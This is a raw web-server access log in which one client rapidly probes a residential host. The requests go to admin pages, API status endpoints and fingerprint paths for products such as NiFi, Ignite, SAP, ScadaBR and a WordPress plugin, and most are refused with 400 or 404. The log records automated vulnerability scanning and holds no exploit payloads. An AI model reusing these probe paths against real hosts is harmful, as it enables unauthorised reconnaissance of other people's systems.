- GET http 91-82-83-208.pool.digikabel.hu "/admin.html" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/decisioncenter-api/v1/about" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/openapi.json" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/system/gwinfo" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/jtcgi/wte.pyc" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/angular.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/nifi-api/flow/about" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/nifi/" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/index.lua" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.pl" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api-description" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/meteobridge.cgi" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:53 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/info.htm" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.php" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/v2" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/themes/admin/default/build/assets/favicon-19fbef86.svg" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/sys/en/neoclassic/login/login" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/ignite?cmd=version" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/monitor/index.php/auth/login" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/management/v1/cluster/state" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/plugins/post-smtp/readme.txt" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/sap/bc/ui2/flp" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.cgi" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/help/en_US/Content/utm/utmAdminGuide/WebAdmin.htm" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/v2.0/systeminfo" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/browser/index.html" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/v1/cluster/summary" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.aspx" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/api/system/status" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/webpages/login.html" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/download/python/" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/nmc/rss/server" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/cgi-bin/getagent.cgi?type=s" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/ScadaBR/login.htm" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.cgi" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/sms_mp/.sms_aut?mplist" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/angular.js" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/admin" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.html" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/rest/settings" [Client 139.162.173.209] [Length 252] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/dashboard/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[24/Jan/2026:01:19:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.cfm" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.asp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.pl" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/start.cfm" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.shtml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:55 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/kubepi/fav.png" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[24/Jan/2026:01:19:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.jsa" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.aspx" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.asp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:56 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/start.aspx" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:56 +0000] 400 - GET http 91-82-83-208.pool.digikabel.hu "/public/static/favicon.png" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[24/Jan/2026:01:19:56 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/default.jhtml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:56 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.shtml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:56 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.pl" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:56 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.php" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:56 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.php" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:56 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.jsp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.jhtml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.aspx" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.inc" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/default.pl" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.cfm" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.cfm" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.cgi" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.shtml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/default.shtml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.cgi" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.cgi" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.cgi" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:59 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.162.173.209] [Length 154] [Gzip -] "-" "-" +[24/Jan/2026:01:19:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/default.jsa" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/start.pl" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.php" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.cgi" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.shtml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.jsa" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:19:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.jsp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.pl" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.pl" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/readme.txt" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.aspx" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.jsa" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.cfm" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.asp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.aspx" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.cgi" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.pl" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/default.asp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.html" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.jsp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.shtml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index.jsa" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.jhtml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.html" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.asp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.cgi" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:03 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inicio.cfm" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:03 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.jhtml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:03 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.asp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:03 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.shtml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:03 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/localstart.jsp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:04 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/main.asp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:04 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indice.jsp" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:04 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.jsa" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:04 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/default.aspx" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:04 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/start.shtml" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:04 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/start.html" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:05 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/base.aspx" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:05 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.jsa" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:05 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/home.cfm" [Client 139.162.173.209] [Length 150] [Gzip -] "Mozilla/5.0 (Android 14; Mobile; rv:128.5.0) Gecko/128.5.0 Firefox/128.5.0" "-" +[24/Jan/2026:01:20:05 +0000] 404 - GET http 